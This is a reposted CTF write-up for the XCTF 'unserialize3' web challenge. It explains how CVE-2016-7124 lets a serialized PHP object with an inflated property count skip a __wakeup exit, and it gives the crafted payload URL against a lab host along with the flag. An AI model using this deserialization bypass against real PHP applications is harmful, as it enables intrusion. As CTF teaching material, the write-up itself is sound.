当前位置:网站首页>Xctf attack and defense world web master advanced area unserialize3

Xctf attack and defense world web master advanced area unserialize3

2022-07-28 03:34:00 l8947943

0x01. Enter the environment

Display a piece of source code :

class xctf{
    
	public $flag = '111';
	public function __wakeup(){
    
	exit('bad requests');
	}
?code=

0x02. Problem analysis

0x02_1. Code audit

First , Define a “xctf” class , This class has two member properties , Namely flag and __wakeup. Next is __wakeup Method implementation , Then there is the last line of variables code Not finished , It is estimated that we want to pass in and complete it .
there __wakeup Function is a so-called “ Magic methods ”, It will be called before other functions when deserializing , Execute its statement .
That means , If we construct a string directly , So this __wakeup_ I'll do it first , And directly exit, This is not what we want .

in other words , We constructed it code After the parameter of is passed in , Be first __wakeup Method first calls . So we can find a way to bypass this function .

0x02_2. Try

Read relevant gods WP After just know , A loophole (CVE-2016-7124) Can pass Make the value representing the number of object attributes in the serialized string greater than the actual number of attributes , To skip __wakeup Implementation .

First , Standard format for serializing strings :O:< The length of the class name >:"< Class name >":< Number of member attributes >:{S:< Length of member attribute name >:"< Member property name >";......} The words of this question , If you want to xctf Class is serialized correctly , Then its string should be :O:4:"xctf":1:{S:4:"flag";S:3:"111";}

Online test address :https://www.dooccn.com/php/, Use the following code to verify .

<?php
class xctf{
    
		public $flag = '111';
		public function __wakeup(){
    
			exit('bad requests');
		}
	}
   $a = new xctf();
   print(serialize($a));
?>

0x02_3. skip __wakeup() function

Modify the serialized string , Modify the number of attributes in the serialized string , And complete string splicing , With get Method outgoing , The address is spliced as follows :

http://61.147.171.105:56068/?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}

Get the final answer , The answer for :cyberpeace{d0e766c698b67400e771051e6b8301aa}

Reference resources :

Depth analysis PHP Serialization and deserialization

原网站

版权声明
本文为[l8947943]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/209/202207280252199730.html

边栏推荐

猜你喜欢

随机推荐